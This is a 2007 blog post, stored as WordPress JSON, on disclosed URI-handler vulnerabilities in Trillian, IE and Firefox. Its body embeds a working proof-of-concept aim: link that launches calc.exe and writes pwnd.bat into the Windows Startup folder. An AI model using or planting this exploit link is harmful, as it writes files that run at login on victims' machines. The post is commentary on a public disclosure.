{"id":320,"date":"2007-07-15T08:57:45","date_gmt":"2007-07-15T12:57:45","guid":{"rendered":"http:\/\/www.thewormbook.com\/hlog\/?p=320"},"modified":"2007-07-15T08:57:45","modified_gmt":"2007-07-15T12:57:45","slug":"security-horrors","status":"publish","type":"post","link":"http:\/\/www.thewormbook.com\/hlog\/?p=320","title":{"rendered":"security horrors"},"content":{"rendered":"<p>Trillian, <span class=\"caps\">IE, <\/span>and Firefox all turn out to be <a href=\"http:\/\/www.oreillynet.com\/onlamp\/blog\/2007\/07\/not_for_the_faint_of_heart_mul.html\">vulnerable to nasty attacks<\/a> which will take some months to fix. I was particularly horrified by the fact that the authors have encoded an entire Google page into an <span class=\"caps\">URL <\/span>&#8212; it doesn&#8217;t lead there: it just causes Firefox to generate a picture of the page. Also, the Trillian exploit does work. Click <a href=\"http:\/\/aim:+&amp;c:\\windows\\system32\\calc.exe\"+ini=\"C:\\Documents+and+Settings\\All+Users\\Start+Menu\\Programs\\Startup\\pwnd.bat\"\">on the <span class=\"caps\">URL<\/span><\/a> and <span class=\"loony\">pwnd.bat<\/span> really does get written to your system.<\/p>\n\n<p>Urgh.<\/p>\n\n<p><span class=\"caps\">UPDATE<\/span>: Rafe Coburn <a href=\"http:\/\/rc3.org\/2007\/07\/safari_30_is_ah.php\">explains<\/a> how this works.<\/p>","protected":false},"excerpt":{"rendered":"<p>Trillian, <span class=\"caps\">IE, <\/span>and Firefox all turn out to be vulnerable to nasty attacks which will take some months to fix. 
I was particularly horrified by the fact that the authors have encoded an entire Google page into an <span class=\"caps\">URL <\/span>&#8212; &hellip; <a href=\"http:\/\/www.thewormbook.com\/hlog\/?p=320\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"_links":{"self":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/posts\/320"}],"collection":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=320"}],"version-history":[{"count":0,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=\/wp\/v2\/posts\/320\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=320"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=320"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.thewormbook.com\/hlog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=320"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}